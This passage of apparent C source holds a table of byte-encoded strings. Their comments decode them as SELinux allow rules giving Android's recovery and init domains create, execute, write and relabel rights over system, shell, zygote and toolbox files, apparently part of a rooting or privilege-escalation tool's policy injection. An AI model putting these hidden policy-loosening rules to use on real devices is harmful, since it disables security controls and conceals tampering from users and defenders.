    "\x63\x53\x1f\x06\x31\x31\x0c\x34\xff\x37\x0a\x00\x0c\x3b\x0a\x37\x3e\xff\x30\x3e\x30\x39\x0a\x32\xdc\x06\x35\x35\xdc\x09\x06\x39\x06\xdc\x0b\x0e\x31\x0a\xff\x0b\x0e\x31\x0a\xff\x00\x37\x0a\x06\x39\x0a", // "allow:recovery:system_app_data_file:file:create"
    "\x63\x53\x1f\x06\x31\x31\x0c\x34\xff\x37\x0a\x00\x0c\x3b\x0a\x37\x3e\xff\x30\x3e\x30\x39\x0a\x32\xdc\x06\x35\x35\xdc\x09\x06\x39\x06\xdc\x0b\x0e\x31\x0a\xff\x0b\x0e\x31\x0a\xff\x3a\x33\x31\x0e\x33\x08", // "allow:recovery:system_app_data_file:file:unlink"
    "\x63\x53\x1d\x06\x31\x31\x0c\x34\xff\x37\x0a\x00\x0c\x3b\x0a\x37\x3e\xff\x30\x3e\x30\x39\x0a\x32\xdc\x06\x35\x35\xdc\x09\x06\x39\x06\xdc\x0b\x0e\x31\x0a\xff\x0b\x0e\x31\x0a\xff\x0c\x35\x0a\x33", // "allow:recovery:system_app_data_file:file:open"
    "\x63\x53\x1d\x06\x31\x31\x0c\x34\xff\x37\x0a\x00\x0c\x3b\x0a\x37\x3e\xff\x30\x3e\x30\x39\x0a\x32\xdc\x06\x35\x35\xdc\x09\x06\x39\x06\xdc\x0b\x0e\x31\x0a\xff\x0b\x0e\x31\x0a\xff\x37\x0a\x06\x09", // "allow:recovery:system_app_data_file:file:read"
    "\x63\x53\x1e\x06\x31\x31\x0c\x34\xff\x37\x0a\x00\x0c\x3b\x0a\x37\x3e\xff\x30\x3e\x30\x39\x0a\x32\xdc\x06\x35\x35\xdc\x09\x06\x39\x06\xdc\x0b\x0e\x31\x0a\xff\x0b\x0e\x31\x0a\xff\x34\x37\x0e\x39\x0a", // "allow:recovery:system_app_data_file:file:write"
    "\x63\x53\x00\x06\x31\x31\x0c\x34\xff\x37\x0a\x00\x0c\x3b\x0a\x37\x3e\xff\x30\x3e\x30\x39\x0a\x32\xdc\x06\x35\x35\xdc\x09\x06\x39\x06\xdc\x0b\x0e\x31\x0a\xff\x0b\x0e\x31\x0a\xff\x04\x0a\x39\x06\x39\x39\x37", // "allow:recovery:system_app_data_file:file:getattr"
    "\x63\x53\x00\x06\x31\x31\x0c\x34\xff\x37\x0a\x00\x0c\x3b\x0a\x37\x3e\xff\x30\x3e\x30\x39\x0a\x32\xdc\x06\x35\x35\xdc\x09\x06\x39\x06\xdc\x0b\x0e\x31\x0a\xff\x0b\x0e\x31\x0a\xff\x30\x0a\x39\x06\x39\x39\x37", // "allow:recovery:system_app_data_file:file:setattr"
    "\x63\x53\x00\x06\x31\x31\x0c\x34\xff\x37\x0a\x00\x0c\x3b\x0a\x37\x3e\xff\x30\x3e\x30\x39\x0a\x32\xdc\x06\x35\x35\xdc\x09\x06\x39\x06\xdc\x0b\x0e\x31\x0a\xff\x0b\x0e\x31\x0a\xff\x0a\x3d\x0a\x00\x3a\x39\x0a", // "allow:recovery:system_app_data_file:file:execute"
    "\x63\x53\x09\x06\x31\x31\x0c\x34\xff\x37\x0a\x00\x0c\x3b\x0a\x37\x3e\xff\x30\x3e\x30\x39\x0a\x32\xdc\x06\x35\x35\xdc\x09\x06\x39\x06\xdc\x0b\x0e\x31\x0a\xff\x0b\x0e\x31\x0a\xff\x0a\x3d\x0a\x00\x3a\x39\x0a\xdc\x33\x0c\xdc\x39\x37\x06\x33\x30", // "allow:recovery:system_app_data_file:file:execute_no_trans"
    "\x63\x53\x04\x06\x31\x31\x0c\x34\xff\x37\x0a\x00\x0c\x3b\x0a\x37\x3e\xff\x30\x3e\x30\x39\x0a\x32\xdc\x06\x35\x35\xdc\x09\x06\x39\x06\xdc\x0b\x0e\x31\x0a\xff\x0b\x0e\x31\x0a\xff\x37\x0a\x31\x06\x07\x0a\x31\x0b\x37\x0c\x32", // "allow:recovery:system_app_data_file:file:relabelfrom"
    "\x63\x53\x02\x06\x31\x31\x0c\x34\xff\x37\x0a\x00\x0c\x3b\x0a\x37\x3e\xff\x30\x3e\x30\x39\x0a\x32\xdc\x06\x35\x35\xdc\x09\x06\x39\x06\xdc\x0b\x0e\x31\x0a\xff\x0b\x0e\x31\x0a\xff\x37\x0a\x31\x06\x07\x0a\x31\x39\x0c", // "allow:recovery:system_app_data_file:file:relabelto"
    "\x63\x53\x18\x06\x31\x31\x0c\x34\xff\x37\x0a\x00\x0c\x3b\x0a\x37\x3e\xff\x06\x35\x35\xdc\x09\x06\x39\x06\xdc\x0b\x0e\x31\x0a\xff\x0b\x0e\x31\x0a\xff\x00\x37\x0a\x06\x39\x0a", // "allow:recovery:app_data_file:file:create"
    "\x63\x53\x18\x06\x31\x31\x0c\x34\xff\x37\x0a\x00\x0c\x3b\x0a\x37\x3e\xff\x06\x35\x35\xdc\x09\x06\x39\x06\xdc\x0b\x0e\x31\x0a\xff\x0b\x0e\x31\x0a\xff\x3a\x33\x31\x0e\x33\x08", // "allow:recovery:app_data_file:file:unlink"
    "\x63\x53\x16\x06\x31\x31\x0c\x34\xff\x37\x0a\x00\x0c\x3b\x0a\x37\x3e\xff\x06\x35\x35\xdc\x09\x06\x39\x06\xdc\x0b\x0e\x31\x0a\xff\x0b\x0e\x31\x0a\xff\x0c\x35\x0a\x33", // "allow:recovery:app_data_file:file:open"
    "\x63\x53\x16\x06\x31\x31\x0c\x34\xff\x37\x0a\x00\x0c\x3b\x0a\x37\x3e\xff\x06\x35\x35\xdc\x09\x06\x39\x06\xdc\x0b\x0e\x31\x0a\xff\x0b\x0e\x31\x0a\xff\x37\x0a\x06\x09", // "allow:recovery:app_data_file:file:read"
    "\x63\x53\x17\x06\x31\x31\x0c\x34\xff\x37\x0a\x00\x0c\x3b\x0a\x37\x3e\xff\x06\x35\x35\xdc\x09\x06\x39\x06\xdc\x0b\x0e\x31\x0a\xff\x0b\x0e\x31\x0a\xff\x34\x37\x0e\x39\x0a", // "allow:recovery:app_data_file:file:write"
    "\x63\x53\x19\x06\x31\x31\x0c\x34\xff\x37\x0a\x00\x0c\x3b\x0a\x37\x3e\xff\x06\x35\x35\xdc\x09\x06\x39\x06\xdc\x0b\x0e\x31\x0a\xff\x0b\x0e\x31\x0a\xff\x04\x0a\x39\x06\x39\x39\x37", // "allow:recovery:app_data_file:file:getattr"
    "\x63\x53\x19\x06\x31\x31\x0c\x34\xff\x37\x0a\x00\x0c\x3b\x0a\x37\x3e\xff\x06\x35\x35\xdc\x09\x06\x39\x06\xdc\x0b\x0e\x31\x0a\xff\x0b\x0e\x31\x0a\xff\x30\x0a\x39\x06\x39\x39\x37", // "allow:recovery:app_data_file:file:setattr"
    "\x63\x53\x19\x06\x31\x31\x0c\x34\xff\x37\x0a\x00\x0c\x3b\x0a\x37\x3e\xff\x06\x35\x35\xdc\x09\x06\x39\x06\xdc\x0b\x0e\x31\x0a\xff\x0b\x0e\x31\x0a\xff\x0a\x3d\x0a\x00\x3a\x39\x0a", // "allow:recovery:app_data_file:file:execute"
    "\x63\x53\x02\x06\x31\x31\x0c\x34\xff\x37\x0a\x00\x0c\x3b\x0a\x37\x3e\xff\x06\x35\x35\xdc\x09\x06\x39\x06\xdc\x0b\x0e\x31\x0a\xff\x0b\x0e\x31\x0a\xff\x0a\x3d\x0a\x00\x3a\x39\x0a\xdc\x33\x0c\xdc\x39\x37\x06\x33\x30", // "allow:recovery:app_data_file:file:execute_no_trans"
    "\x63\x53\x1d\x06\x31\x31\x0c\x34\xff\x37\x0a\x00\x0c\x3b\x0a\x37\x3e\xff\x06\x35\x35\xdc\x09\x06\x39\x06\xdc\x0b\x0e\x31\x0a\xff\x0b\x0e\x31\x0a\xff\x37\x0a\x31\x06\x07\x0a\x31\x0b\x37\x0c\x32", // "allow:recovery:app_data_file:file:relabelfrom"
    "\x63\x53\x1b\x06\x31\x31\x0c\x34\xff\x37\x0a\x00\x0c\x3b\x0a\x37\x3e\xff\x06\x35\x35\xdc\x09\x06\x39\x06\xdc\x0b\x0e\x31\x0a\xff\x0b\x0e\x31\x0a\xff\x37\x0a\x31\x06\x07\x0a\x31\x39\x0c", // "allow:recovery:app_data_file:file:relabelto"
    "\x63\x53\x1a\x06\x31\x31\x0c\x34\xff\x37\x0a\x00\x0c\x3b\x0a\x37\x3e\xff\x30\x0d\x0a\x31\x31\xdc\x09\x06\x39\x06\xdc\x0b\x0e\x31\x0a\xff\x0b\x0e\x31\x0a\xff\x00\x37\x0a\x06\x39\x0a", // "allow:recovery:shell_data_file:file:create"
    "\x63\x53\x1a\x06\x31\x31\x0c\x34\xff\x37\x0a\x00\x0c\x3b\x0a\x37\x3e\xff\x30\x0d\x0a\x31\x31\xdc\x09\x06\x39\x06\xdc\x0b\x0e\x31\x0a\xff\x0b\x0e\x31\x0a\xff\x3a\x33\x31\x0e\x33\x08", // "allow:recovery:shell_data_file:file:unlink"
    "\x63\x53\x18\x06\x31\x31\x0c\x34\xff\x37\x0a\x00\x0c\x3b\x0a\x37\x3e\xff\x30\x0d\x0a\x31\x31\xdc\x09\x06\x39\x06\xdc\x0b\x0e\x31\x0a\xff\x0b\x0e\x31\x0a\xff\x0c\x35\x0a\x33", // "allow:recovery:shell_data_file:file:open"
    "\x63\x53\x18\x06\x31\x31\x0c\x34\xff\x37\x0a\x00\x0c\x3b\x0a\x37\x3e\xff\x30\x0d\x0a\x31\x31\xdc\x09\x06\x39\x06\xdc\x0b\x0e\x31\x0a\xff\x0b\x0e\x31\x0a\xff\x37\x0a\x06\x09", // "allow:recovery:shell_data_file:file:read"
    "\x63\x53\x19\x06\x31\x31\x0c\x34\xff\x37\x0a\x00\x0c\x3b\x0a\x37\x3e\xff\x30\x0d\x0a\x31\x31\xdc\x09\x06\x39\x06\xdc\x0b\x0e\x31\x0a\xff\x0b\x0e\x31\x0a\xff\x34\x37\x0e\x39\x0a", // "allow:recovery:shell_data_file:file:write"
    "\x63\x53\x1b\x06\x31\x31\x0c\x34\xff\x37\x0a\x00\x0c\x3b\x0a\x37\x3e\xff\x30\x0d\x0a\x31\x31\xdc\x09\x06\x39\x06\xdc\x0b\x0e\x31\x0a\xff\x0b\x0e\x31\x0a\xff\x04\x0a\x39\x06\x39\x39\x37", // "allow:recovery:shell_data_file:file:getattr"
    "\x63\x53\x1b\x06\x31\x31\x0c\x34\xff\x37\x0a\x00\x0c\x3b\x0a\x37\x3e\xff\x30\x0d\x0a\x31\x31\xdc\x09\x06\x39\x06\xdc\x0b\x0e\x31\x0a\xff\x0b\x0e\x31\x0a\xff\x30\x0a\x39\x06\x39\x39\x37", // "allow:recovery:shell_data_file:file:setattr"
    "\x63\x53\x1b\x06\x31\x31\x0c\x34\xff\x37\x0a\x00\x0c\x3b\x0a\x37\x3e\xff\x30\x0d\x0a\x31\x31\xdc\x09\x06\x39\x06\xdc\x0b\x0e\x31\x0a\xff\x0b\x0e\x31\x0a\xff\x0a\x3d\x0a\x00\x3a\x39\x0a", // "allow:recovery:shell_data_file:file:execute"
    "\x63\x53\x04\x06\x31\x31\x0c\x34\xff\x37\x0a\x00\x0c\x3b\x0a\x37\x3e\xff\x30\x0d\x0a\x31\x31\xdc\x09\x06\x39\x06\xdc\x0b\x0e\x31\x0a\xff\x0b\x0e\x31\x0a\xff\x0a\x3d\x0a\x00\x3a\x39\x0a\xdc\x33\x0c\xdc\x39\x37\x06\x33\x30", // "allow:recovery:shell_data_file:file:execute_no_trans"
    "\x63\x53\x1f\x06\x31\x31\x0c\x34\xff\x37\x0a\x00\x0c\x3b\x0a\x37\x3e\xff\x30\x0d\x0a\x31\x31\xdc\x09\x06\x39\x06\xdc\x0b\x0e\x31\x0a\xff\x0b\x0e\x31\x0a\xff\x37\x0a\x31\x06\x07\x0a\x31\x0b\x37\x0c\x32", // "allow:recovery:shell_data_file:file:relabelfrom"
    "\x63\x53\x1d\x06\x31\x31\x0c\x34\xff\x37\x0a\x00\x0c\x3b\x0a\x37\x3e\xff\x30\x0d\x0a\x31\x31\xdc\x09\x06\x39\x06\xdc\x0b\x0e\x31\x0a\xff\x0b\x0e\x31\x0a\xff\x37\x0a\x31\x06\x07\x0a\x31\x39\x0c", // "allow:recovery:shell_data_file:file:relabelto"
    "\x63\x53\x13\x06\x31\x31\x0c\x34\xff\x37\x0a\x00\x0c\x3b\x0a\x37\x3e\xff\x31\x33\x08\xdc\x0b\x0e\x31\x0a\xff\x0b\x0e\x31\x0a\xff\x00\x37\x0a\x06\x39\x0a", // "allow:recovery:lnk_file:file:create"
    "\x63\x53\x13\x06\x31\x31\x0c\x34\xff\x37\x0a\x00\x0c\x3b\x0a\x37\x3e\xff\x31\x33\x08\xdc\x0b\x0e\x31\x0a\xff\x0b\x0e\x31\x0a\xff\x3a\x33\x31\x0e\x33\x08", // "allow:recovery:lnk_file:file:unlink"
    "\x63\x53\x11\x06\x31\x31\x0c\x34\xff\x37\x0a\x00\x0c\x3b\x0a\x37\x3e\xff\x31\x33\x08\xdc\x0b\x0e\x31\x0a\xff\x0b\x0e\x31\x0a\xff\x0c\x35\x0a\x33", // "allow:recovery:lnk_file:file:open"
    "\x63\x53\x11\x06\x31\x31\x0c\x34\xff\x37\x0a\x00\x0c\x3b\x0a\x37\x3e\xff\x31\x33\x08\xdc\x0b\x0e\x31\x0a\xff\x0b\x0e\x31\x0a\xff\x37\x0a\x06\x09", // "allow:recovery:lnk_file:file:read"
    "\x63\x53\x12\x06\x31\x31\x0c\x34\xff\x37\x0a\x00\x0c\x3b\x0a\x37\x3e\xff\x31\x33\x08\xdc\x0b\x0e\x31\x0a\xff\x0b\x0e\x31\x0a\xff\x34\x37\x0e\x39\x0a", // "allow:recovery:lnk_file:file:write"
    "\x63\x53\x14\x06\x31\x31\x0c\x34\xff\x37\x0a\x00\x0c\x3b\x0a\x37\x3e\xff\x31\x33\x08\xdc\x0b\x0e\x31\x0a\xff\x0b\x0e\x31\x0a\xff\x04\x0a\x39\x06\x39\x39\x37", // "allow:recovery:lnk_file:file:getattr"
    "\x63\x53\x14\x06\x31\x31\x0c\x34\xff\x37\x0a\x00\x0c\x3b\x0a\x37\x3e\xff\x31\x33\x08\xdc\x0b\x0e\x31\x0a\xff\x0b\x0e\x31\x0a\xff\x30\x0a\x39\x06\x39\x39\x37", // "allow:recovery:lnk_file:file:setattr"
    "\x63\x53\x14\x06\x31\x31\x0c\x34\xff\x37\x0a\x00\x0c\x3b\x0a\x37\x3e\xff\x31\x33\x08\xdc\x0b\x0e\x31\x0a\xff\x0b\x0e\x31\x0a\xff\x0a\x3d\x0a\x00\x3a\x39\x0a", // "allow:recovery:lnk_file:file:execute"
    "\x63\x53\x1d\x06\x31\x31\x0c\x34\xff\x37\x0a\x00\x0c\x3b\x0a\x37\x3e\xff\x31\x33\x08\xdc\x0b\x0e\x31\x0a\xff\x0b\x0e\x31\x0a\xff\x0a\x3d\x0a\x00\x3a\x39\x0a\xdc\x33\x0c\xdc\x39\x37\x06\x33\x30", // "allow:recovery:lnk_file:file:execute_no_trans"
    "\x63\x53\x18\x06\x31\x31\x0c\x34\xff\x37\x0a\x00\x0c\x3b\x0a\x37\x3e\xff\x31\x33\x08\xdc\x0b\x0e\x31\x0a\xff\x0b\x0e\x31\x0a\xff\x37\x0a\x31\x06\x07\x0a\x31\x0b\x37\x0c\x32", // "allow:recovery:lnk_file:file:relabelfrom"
    "\x63\x53\x16\x06\x31\x31\x0c\x34\xff\x37\x0a\x00\x0c\x3b\x0a\x37\x3e\xff\x31\x33\x08\xdc\x0b\x0e\x31\x0a\xff\x0b\x0e\x31\x0a\xff\x37\x0a\x31\x06\x07\x0a\x31\x39\x0c", // "allow:recovery:lnk_file:file:relabelto"
    "\x63\x53\x16\x06\x31\x31\x0c\x34\xff\x37\x0a\x00\x0c\x3b\x0a\x37\x3e\xff\x3f\x3e\x04\x0c\x39\x0a\xdc\x0a\x3d\x0a\x00\xff\x0b\x0e\x31\x0a\xff\x00\x37\x0a\x06\x39\x0a", // "allow:recovery:zygote_exec:file:create"
    "\x63\x53\x16\x06\x31\x31\x0c\x34\xff\x37\x0a\x00\x0c\x3b\x0a\x37\x3e\xff\x3f\x3e\x04\x0c\x39\x0a\xdc\x0a\x3d\x0a\x00\xff\x0b\x0e\x31\x0a\xff\x3a\x33\x31\x0e\x33\x08", // "allow:recovery:zygote_exec:file:unlink"
    "\x63\x53\x14\x06\x31\x31\x0c\x34\xff\x37\x0a\x00\x0c\x3b\x0a\x37\x3e\xff\x3f\x3e\x04\x0c\x39\x0a\xdc\x0a\x3d\x0a\x00\xff\x0b\x0e\x31\x0a\xff\x0c\x35\x0a\x33", // "allow:recovery:zygote_exec:file:open"
    "\x63\x53\x14\x06\x31\x31\x0c\x34\xff\x37\x0a\x00\x0c\x3b\x0a\x37\x3e\xff\x3f\x3e\x04\x0c\x39\x0a\xdc\x0a\x3d\x0a\x00\xff\x0b\x0e\x31\x0a\xff\x37\x0a\x06\x09", // "allow:recovery:zygote_exec:file:read"
    "\x63\x53\x15\x06\x31\x31\x0c\x34\xff\x37\x0a\x00\x0c\x3b\x0a\x37\x3e\xff\x3f\x3e\x04\x0c\x39\x0a\xdc\x0a\x3d\x0a\x00\xff\x0b\x0e\x31\x0a\xff\x34\x37\x0e\x39\x0a", // "allow:recovery:zygote_exec:file:write"
    "\x63\x53\x17\x06\x31\x31\x0c\x34\xff\x37\x0a\x00\x0c\x3b\x0a\x37\x3e\xff\x3f\x3e\x04\x0c\x39\x0a\xdc\x0a\x3d\x0a\x00\xff\x0b\x0e\x31\x0a\xff\x04\x0a\x39\x06\x39\x39\x37", // "allow:recovery:zygote_exec:file:getattr"
    "\x63\x53\x17\x06\x31\x31\x0c\x34\xff\x37\x0a\x00\x0c\x3b\x0a\x37\x3e\xff\x3f\x3e\x04\x0c\x39\x0a\xdc\x0a\x3d\x0a\x00\xff\x0b\x0e\x31\x0a\xff\x30\x0a\x39\x06\x39\x39\x37", // "allow:recovery:zygote_exec:file:setattr"
    "\x63\x53\x17\x06\x31\x31\x0c\x34\xff\x37\x0a\x00\x0c\x3b\x0a\x37\x3e\xff\x3f\x3e\x04\x0c\x39\x0a\xdc\x0a\x3d\x0a\x00\xff\x0b\x0e\x31\x0a\xff\x0a\x3d\x0a\x00\x3a\x39\x0a", // "allow:recovery:zygote_exec:file:execute"
    "\x63\x53\x00\x06\x31\x31\x0c\x34\xff\x37\x0a\x00\x0c\x3b\x0a\x37\x3e\xff\x3f\x3e\x04\x0c\x39\x0a\xdc\x0a\x3d\x0a\x00\xff\x0b\x0e\x31\x0a\xff\x0a\x3d\x0a\x00\x3a\x39\x0a\xdc\x33\x0c\xdc\x39\x37\x06\x33\x30", // "allow:recovery:zygote_exec:file:execute_no_trans"
    "\x63\x53\x1b\x06\x31\x31\x0c\x34\xff\x37\x0a\x00\x0c\x3b\x0a\x37\x3e\xff\x3f\x3e\x04\x0c\x39\x0a\xdc\x0a\x3d\x0a\x00\xff\x0b\x0e\x31\x0a\xff\x37\x0a\x31\x06\x07\x0a\x31\x0b\x37\x0c\x32", // "allow:recovery:zygote_exec:file:relabelfrom"
    "\x63\x53\x19\x06\x31\x31\x0c\x34\xff\x37\x0a\x00\x0c\x3b\x0a\x37\x3e\xff\x3f\x3e\x04\x0c\x39\x0a\xdc\x0a\x3d\x0a\x00\xff\x0b\x0e\x31\x0a\xff\x37\x0a\x31\x06\x07\x0a\x31\x39\x0c", // "allow:recovery:zygote_exec:file:relabelto"
    "\x63\x53\x17\x06\x31\x31\x0c\x34\xff\x37\x0a\x00\x0c\x3b\x0a\x37\x3e\xff\x39\x0c\x0c\x31\x07\x0c\x3d\xdc\x0a\x3d\x0a\x00\xff\x0b\x0e\x31\x0a\xff\x00\x37\x0a\x06\x39\x0a", // "allow:recovery:toolbox_exec:file:create"
    "\x63\x53\x17\x06\x31\x31\x0c\x34\xff\x37\x0a\x00\x0c\x3b\x0a\x37\x3e\xff\x39\x0c\x0c\x31\x07\x0c\x3d\xdc\x0a\x3d\x0a\x00\xff\x0b\x0e\x31\x0a\xff\x3a\x33\x31\x0e\x33\x08", // "allow:recovery:toolbox_exec:file:unlink"
    "\x63\x53\x15\x06\x31\x31\x0c\x34\xff\x37\x0a\x00\x0c\x3b\x0a\x37\x3e\xff\x39\x0c\x0c\x31\x07\x0c\x3d\xdc\x0a\x3d\x0a\x00\xff\x0b\x0e\x31\x0a\xff\x0c\x35\x0a\x33", // "allow:recovery:toolbox_exec:file:open"
    "\x63\x53\x15\x06\x31\x31\x0c\x34\xff\x37\x0a\x00\x0c\x3b\x0a\x37\x3e\xff\x39\x0c\x0c\x31\x07\x0c\x3d\xdc\x0a\x3d\x0a\x00\xff\x0b\x0e\x31\x0a\xff\x37\x0a\x06\x09", // "allow:recovery:toolbox_exec:file:read"
    "\x63\x53\x16\x06\x31\x31\x0c\x34\xff\x37\x0a\x00\x0c\x3b\x0a\x37\x3e\xff\x39\x0c\x0c\x31\x07\x0c\x3d\xdc\x0a\x3d\x0a\x00\xff\x0b\x0e\x31\x0a\xff\x34\x37\x0e\x39\x0a", // "allow:recovery:toolbox_exec:file:write"
    "\x63\x53\x18\x06\x31\x31\x0c\x34\xff\x37\x0a\x00\x0c\x3b\x0a\x37\x3e\xff\x39\x0c\x0c\x31\x07\x0c\x3d\xdc\x0a\x3d\x0a\x00\xff\x0b\x0e\x31\x0a\xff\x04\x0a\x39\x06\x39\x39\x37", // "allow:recovery:toolbox_exec:file:getattr"
    "\x63\x53\x18\x06\x31\x31\x0c\x34\xff\x37\x0a\x00\x0c\x3b\x0a\x37\x3e\xff\x39\x0c\x0c\x31\x07\x0c\x3d\xdc\x0a\x3d\x0a\x00\xff\x0b\x0e\x31\x0a\xff\x30\x0a\x39\x06\x39\x39\x37", // "allow:recovery:toolbox_exec:file:setattr"
    "\x63\x53\x18\x06\x31\x31\x0c\x34\xff\x37\x0a\x00\x0c\x3b\x0a\x37\x3e\xff\x39\x0c\x0c\x31\x07\x0c\x3d\xdc\x0a\x3d\x0a\x00\xff\x0b\x0e\x31\x0a\xff\x0a\x3d\x0a\x00\x3a\x39\x0a", // "allow:recovery:toolbox_exec:file:execute"
    "\x63\x53\x01\x06\x31\x31\x0c\x34\xff\x37\x0a\x00\x0c\x3b\x0a\x37\x3e\xff\x39\x0c\x0c\x31\x07\x0c\x3d\xdc\x0a\x3d\x0a\x00\xff\x0b\x0e\x31\x0a\xff\x0a\x3d\x0a\x00\x3a\x39\x0a\xdc\x33\x0c\xdc\x39\x37\x06\x33\x30", // "allow:recovery:toolbox_exec:file:execute_no_trans"
    "\x63\x53\x1c\x06\x31\x31\x0c\x34\xff\x37\x0a\x00\x0c\x3b\x0a\x37\x3e\xff\x39\x0c\x0c\x31\x07\x0c\x3d\xdc\x0a\x3d\x0a\x00\xff\x0b\x0e\x31\x0a\xff\x37\x0a\x31\x06\x07\x0a\x31\x0b\x37\x0c\x32", // "allow:recovery:toolbox_exec:file:relabelfrom"
    "\x63\x53\x1a\x06\x31\x31\x0c\x34\xff\x37\x0a\x00\x0c\x3b\x0a\x37\x3e\xff\x39\x0c\x0c\x31\x07\x0c\x3d\xdc\x0a\x3d\x0a\x00\xff\x0b\x0e\x31\x0a\xff\x37\x0a\x31\x06\x07\x0a\x31\x39\x0c", // "allow:recovery:toolbox_exec:file:relabelto"
    "\x63\x53\x2a\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xff\x0b\x3a\x30\x0a\xff\x09\x0e\x37\xff\x30\x0a\x06\x37\x00\x0d", // "allow:init:fuse:dir:search"
    "\x63\x53\x2c\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xff\x0b\x3a\x30\x0a\xff\x09\x0e\x37\xff\x06\x09\x09\xdc\x33\x06\x32\x0a", // "allow:init:fuse:dir:add_name"
    "\x63\x53\x2f\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xff\x0b\x3a\x30\x0a\xff\x09\x0e\x37\xff\x37\x0a\x32\x0c\x3b\x0a\xdc\x33\x06\x32\x0a", // "allow:init:fuse:dir:remove_name"
    "\x63\x53\x28\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xff\x0b\x3a\x30\x0a\xff\x09\x0e\x37\xff\x0c\x35\x0a\x33", // "allow:init:fuse:dir:open"
    "\x63\x53\x28\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xff\x0b\x3a\x30\x0a\xff\x09\x0e\x37\xff\x37\x0a\x06\x09", // "allow:init:fuse:dir:read"
    "\x63\x53\x29\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xff\x0b\x3a\x30\x0a\xff\x09\x0e\x37\xff\x34\x37\x0e\x39\x0a", // "allow:init:fuse:dir:write"
    "\x63\x53\x2b\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xff\x0b\x3a\x30\x0a\xff\x09\x0e\x37\xff\x04\x0a\x39\x06\x39\x39\x37", // "allow:init:fuse:dir:getattr"
    "\x63\x53\x2b\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xff\x0b\x3a\x30\x0a\xff\x09\x0e\x37\xff\x30\x0a\x39\x06\x39\x39\x37", // "allow:init:fuse:dir:setattr"
    "\x63\x53\x2f\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xff\x0b\x3a\x30\x0a\xff\x09\x0e\x37\xff\x37\x0a\x31\x06\x07\x0a\x31\x0b\x37\x0c\x32", // "allow:init:fuse:dir:relabelfrom"
    "\x63\x53\x2d\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xff\x0b\x3a\x30\x0a\xff\x09\x0e\x37\xff\x37\x0a\x31\x06\x07\x0a\x31\x39\x0c", // "allow:init:fuse:dir:relabelto"
    "\x63\x53\x2c\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xff\x37\x0c\x0c\x39\x0b\x30\xff\x09\x0e\x37\xff\x30\x0a\x06\x37\x00\x0d", // "allow:init:rootfs:dir:search"
    "\x63\x53\x2e\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xff\x37\x0c\x0c\x39\x0b\x30\xff\x09\x0e\x37\xff\x06\x09\x09\xdc\x33\x06\x32\x0a", // "allow:init:rootfs:dir:add_name"
    "\x63\x53\x11\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xff\x37\x0c\x0c\x39\x0b\x30\xff\x09\x0e\x37\xff\x37\x0a\x32\x0c\x3b\x0a\xdc\x33\x06\x32\x0a", // "allow:init:rootfs:dir:remove_name"
    "\x63\x53\x2a\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xff\x37\x0c\x0c\x39\x0b\x30\xff\x09\x0e\x37\xff\x0c\x35\x0a\x33", // "allow:init:rootfs:dir:open"
    "\x63\x53\x2a\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xff\x37\x0c\x0c\x39\x0b\x30\xff\x09\x0e\x37\xff\x37\x0a\x06\x09", // "allow:init:rootfs:dir:read"
    "\x63\x53\x2b\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xff\x37\x0c\x0c\x39\x0b\x30\xff\x09\x0e\x37\xff\x34\x37\x0e\x39\x0a", // "allow:init:rootfs:dir:write"
    "\x63\x53\x2d\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xff\x37\x0c\x0c\x39\x0b\x30\xff\x09\x0e\x37\xff\x04\x0a\x39\x06\x39\x39\x37", // "allow:init:rootfs:dir:getattr"
    "\x63\x53\x2d\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xff\x37\x0c\x0c\x39\x0b\x30\xff\x09\x0e\x37\xff\x30\x0a\x39\x06\x39\x39\x37", // "allow:init:rootfs:dir:setattr"
    "\x63\x53\x11\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xff\x37\x0c\x0c\x39\x0b\x30\xff\x09\x0e\x37\xff\x37\x0a\x31\x06\x07\x0a\x31\x0b\x37\x0c\x32", // "allow:init:rootfs:dir:relabelfrom"
    "\x63\x53\x2f\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xff\x37\x0c\x0c\x39\x0b\x30\xff\x09\x0e\x37\xff\x37\x0a\x31\x06\x07\x0a\x31\x39\x0c", // "allow:init:rootfs:dir:relabelto"
    "\x63\x53\x11\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xff\x30\x3e\x30\x39\x0a\x32\xdc\x0b\x0e\x31\x0a\xff\x09\x0e\x37\xff\x30\x0a\x06\x37\x00\x0d", // "allow:init:system_file:dir:search"
    "\x63\x53\x13\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xff\x30\x3e\x30\x39\x0a\x32\xdc\x0b\x0e\x31\x0a\xff\x09\x0e\x37\xff\x06\x09\x09\xdc\x33\x06\x32\x0a", // "allow:init:system_file:dir:add_name"
    "\x63\x53\x16\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xff\x30\x3e\x30\x39\x0a\x32\xdc\x0b\x0e\x31\x0a\xff\x09\x0e\x37\xff\x37\x0a\x32\x0c\x3b\x0a\xdc\x33\x06\x32\x0a", // "allow:init:system_file:dir:remove_name"
    "\x63\x53\x2f\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xff\x30\x3e\x30\x39\x0a\x32\xdc\x0b\x0e\x31\x0a\xff\x09\x0e\x37\xff\x0c\x35\x0a\x33", // "allow:init:system_file:dir:open"
